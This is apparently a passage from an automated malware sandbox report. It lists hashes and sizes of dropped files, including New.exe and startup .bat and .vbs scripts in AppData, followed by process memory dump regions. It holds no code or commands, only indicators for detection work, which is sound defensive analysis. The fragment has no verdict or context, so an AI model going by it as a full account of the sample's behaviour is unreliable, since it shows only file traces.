                                                                                                                  564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\New.exe
                                                                                                                  Filesize

                                                                                                                  409KB

                                                                                                                  MD5

                                                                                                                  cf570b21f42f0ce411b7c9961068931e

                                                                                                                  SHA1

                                                                                                                  f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d

                                                                                                                  SHA256

                                                                                                                  d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234

                                                                                                                  SHA512

                                                                                                                  de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hlz2zrrc.ayx.ps1
                                                                                                                  Filesize

                                                                                                                  60B

                                                                                                                  MD5

                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                  SHA1

                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                  SHA256

                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                  SHA512

                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                • C:\Users\Admin\AppData\Roaming\startup_str_134.bat
                                                                                                                  Filesize

                                                                                                                  1002KB

                                                                                                                  MD5

                                                                                                                  f6d5bfaee8a55ff72c7b453fda066d62

                                                                                                                  SHA1

                                                                                                                  7d737d53013990e5d05076b7206e43eb4793fc7f

                                                                                                                  SHA256

                                                                                                                  3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308

                                                                                                                  SHA512

                                                                                                                  e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284

                                                                                                                • C:\Users\Admin\AppData\Roaming\startup_str_134.vbs
                                                                                                                  Filesize

                                                                                                                  115B

                                                                                                                  MD5

                                                                                                                  b05d306b33af9aa7a0d659d7dff16bec

                                                                                                                  SHA1

                                                                                                                  229a881e9a1900f05445d18337ea0deee8f8ea6f

                                                                                                                  SHA256

                                                                                                                  5bc18b1286fb36a74fe058481326eba5467432eb53a7d73ac89fde8df36ebd07

                                                                                                                  SHA512

                                                                                                                  639317b239489750cd1543b265798f323d8b3cb5fac74c54e2cceaf49618ceb02d8e4a8a5e15a8977597eb88f2b6bd13caaac428d85e16f55bfddc386de53bc4

                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                  Filesize

                                                                                                                  338B

                                                                                                                  MD5

                                                                                                                  521a7a1f096d350efbf6b5b78837b34d

                                                                                                                  SHA1

                                                                                                                  34fc1ebde00200c7172502783c525b723e543cb0

                                                                                                                  SHA256

                                                                                                                  d8de6b055234318654a355a7cd6e7dba342f4afdba4febcb203939eb097bd7f9

                                                                                                                  SHA512

                                                                                                                  82f00e081b77fc02b0f0c640efcab89d7a16fcfac1028987b2f43a45bc2e9289628b8e5c4721c03d6b8d3ab955779640b5a995813a8599d82ce5d27fb92d38cb

                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
                                                                                                                  Filesize

                                                                                                                  412B

                                                                                                                  MD5

                                                                                                                  0b02d765f454bdc785eadea92c12f906

                                                                                                                  SHA1

                                                                                                                  667ca2421ac38ec7b0e573389e48b98ef420e35c

                                                                                                                  SHA256

                                                                                                                  d6506b38ed3113280483516a1a9dfda076b7807f83ef976d99d930fd41880de8

                                                                                                                  SHA512

                                                                                                                  bf805e32a23ad0fd0e60888fbbefff6430cc7cff30bfafc7198e3af776b69249e3dc7f55086515f68ad198a120edf27c5f75d8344a6406cfa32cf9844256f369

                                                                                                                • memory/380-99-0x0000000000D30000-0x0000000000D9C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  432KB

                                                                                                                • memory/452-174-0x00007FFCEDF70000-0x00007FFCEDF80000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/452-168-0x00000234192A0000-0x00000234192CA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/452-173-0x00000234192A0000-0x00000234192CA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/552-158-0x000001AF06770000-0x000001AF0679A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/552-163-0x000001AF06770000-0x000001AF0679A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/552-164-0x00007FFCEDF70000-0x00007FFCEDF80000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/632-133-0x0000016B29980000-0x0000016B299AA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/632-128-0x0000016B29980000-0x0000016B299AA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/632-126-0x0000016B29950000-0x0000016B29975000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  148KB

                                                                                                                • memory/632-134-0x00007FFCEDF70000-0x00007FFCEDF80000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/632-127-0x0000016B29980000-0x0000016B299AA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/684-138-0x000001D1BAD90000-0x000001D1BADBA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/684-144-0x00007FFCEDF70000-0x00007FFCEDF80000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/684-143-0x000001D1BAD90000-0x000001D1BADBA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/996-154-0x00007FFCEDF70000-0x00007FFCEDF80000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/996-153-0x00000219F8260000-0x00000219F828A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/996-148-0x00000219F8260000-0x00000219F828A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/1408-27-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-52-0x00000000073B0000-0x0000000007446000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  600KB

                                                                                                                • memory/1408-53-0x0000000007330000-0x0000000007341000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  68KB

                                                                                                                • memory/1408-54-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-57-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-51-0x00000000071A0000-0x00000000071AA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                • memory/1408-50-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-49-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-48-0x0000000006FE0000-0x0000000007084000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  656KB

                                                                                                                • memory/1408-25-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-26-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-36-0x0000000006F70000-0x0000000006FA4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  208KB

                                                                                                                • memory/1408-37-0x0000000071480000-0x00000000714CC000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  304KB

                                                                                                                • memory/1408-47-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1408-46-0x0000000006FB0000-0x0000000006FCE000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  120KB

                                                                                                                • memory/3512-119-0x00007FFD2DEE0000-0x00007FFD2E0E9000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                • memory/3512-118-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3512-123-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3512-120-0x00007FFD2D2C0000-0x00007FFD2D37D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  756KB

                                                                                                                • memory/3512-113-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3512-116-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3512-115-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3512-114-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3556-112-0x00007FFD2D2C0000-0x00007FFD2D37D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  756KB

                                                                                                                • memory/3556-102-0x000001CBA00B0000-0x000001CBA00D2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  136KB

                                                                                                                • memory/3556-111-0x00007FFD2DEE0000-0x00007FFD2E0E9000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                • memory/3556-110-0x000001CBB87C0000-0x000001CBB87EA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/3724-100-0x00000000085E0000-0x00000000085F2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/3724-81-0x0000000008610000-0x00000000086A2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  584KB

                                                                                                                • memory/3724-738-0x000000000A050000-0x000000000A05A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                • memory/3724-80-0x00000000083F0000-0x000000000845C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  432KB

                                                                                                                • memory/3724-736-0x000000000A150000-0x000000000A18C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  240KB

                                                                                                                • memory/5044-22-0x00000000086B0000-0x00000000087A2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  968KB

                                                                                                                • memory/5044-5-0x0000000005680000-0x00000000056A2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  136KB

                                                                                                                • memory/5044-20-0x00000000085C0000-0x00000000085DA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  104KB

                                                                                                                • memory/5044-19-0x0000000008C40000-0x00000000092BA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  6.5MB

                                                                                                                • memory/5044-18-0x00000000064B0000-0x00000000064FC000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  304KB

                                                                                                                • memory/5044-17-0x0000000006400000-0x000000000641E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  120KB

                                                                                                                • memory/5044-16-0x0000000005F20000-0x0000000006277000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.3MB

                                                                                                                • memory/5044-7-0x0000000005EB0000-0x0000000005F16000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  408KB

                                                                                                                • memory/5044-6-0x0000000005E40000-0x0000000005EA6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  408KB

                                                                                                                • memory/5044-21-0x0000000008580000-0x0000000008588000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/5044-4-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/5044-3-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/5044-23-0x000000000A870000-0x000000000AE16000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  5.6MB

                                                                                                                • memory/5044-75-0x0000000075290000-0x0000000075A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/5044-0-0x000000007529E000-0x000000007529F000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5044-2-0x0000000005720000-0x0000000005D4A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  6.2MB

                                                                                                                • memory/5044-1-0x00000000030A0000-0x00000000030D6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  216KB